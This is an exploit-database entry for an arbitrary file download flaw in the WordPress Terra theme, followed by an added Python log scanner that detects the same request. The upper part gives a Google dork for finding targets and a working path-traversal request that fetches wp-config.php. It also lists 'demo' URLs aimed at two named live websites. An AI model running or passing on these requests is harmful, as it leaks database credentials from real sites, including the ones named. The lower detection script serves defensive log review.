WordPress Theme Terra Arbitrary File Download Vulnerability

2015-01-18T00:00:00
ID 1337DAY-ID-23142
Type zdt
Reporter terrorist
Modified 2015-01-18T00:00:00

Description

Exploit for PHP platform in category web applications

                                        
######################
# Exploit Title: WordPress Theme Terra Arbitrary File Download Vulnerability
# Date: 18/01/2015
# Exploit Author: t3rr0rist - GHC (Georgian Hacking Community) team
# Contact : mrinjector17@gmail.com
# Tested on: Linux
# Google Dork: inurl:"wp-content/themes/terra/"
######################
  
# Proof of Concept

http://[target]/[path]/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
 

# Demo

http://bh-3.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
http://mcity.se/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

#  0day.today [2016-04-20]  #
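
For defenders, the request shape in the proof of concept above can be searched for in web server access logs. The following is an added example, not part of the original advisory: it assumes combined-format log lines, and the image extension allow-list, function names and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Assumption: extensions a legitimate slider image request would end with.
IMAGE_EXT = (".jpg", ".jpeg", ".png", ".gif", ".webp", ".bmp")
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def is_suspicious(request_target):
    """Return a reason if the request matches the advisory's pattern, else None."""
    parts = urlsplit(request_target)
    if not parts.path.endswith("/wp-admin/admin-ajax.php"):
        return None
    params = parse_qs(parts.query, keep_blank_values=True)
    if "revslider_show_image" not in params.get("action", []):
        return None
    for img in params.get("img", []):
        # parse_qs already decoded once; decode again and normalise separators
        decoded = unquote(img).replace("\\", "/")
        if "../" in decoded or decoded.startswith("/"):
            return "path traversal in img"
        if not decoded.lower().endswith(IMAGE_EXT):
            return "non-image file requested via img"
    return None

def scan(log_lines):
    """Return (client_ip, reason) for every log line that matches."""
    hits = []
    for line in log_lines:
        m = REQUEST_RE.search(line)
        reason = is_suspicious(m.group(1)) if m else None
        if reason:
            hits.append((line.split()[0], reason))
    return hits

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE = [
    '203.0.113.7 - - [18/Jan/2015:10:00:01 +0000] "GET /wp-admin/admin-ajax.php'
    '?action=revslider_show_image&img=../wp-config.php HTTP/1.1" 200 3120',
    '198.51.100.4 - - [18/Jan/2015:10:00:05 +0000] "GET /wp-admin/admin-ajax.php'
    '?action=revslider_show_image&img=uploads/slide1.jpg HTTP/1.1" 200 48211',
    '203.0.113.9 - - [18/Jan/2015:10:01:12 +0000] "GET /blog/wp-admin/admin-ajax.php'
    '?action=revslider_show_image&img=%2e%2e%2fwp-config.php HTTP/1.1" 200 3120',
    '198.51.100.8 - - [18/Jan/2015:10:02:00 +0000] "GET /wp-admin/admin-ajax.php'
    '?action=heartbeat HTTP/1.1" 200 52',
]

if __name__ == "__main__":
    for ip, reason in scan(SAMPLE):
        print(ip, reason)
```

A hit with a 200 status and a response size close to that of `wp-config.php` suggests the file was actually served, in which case the database credentials and salts it contains should be rotated.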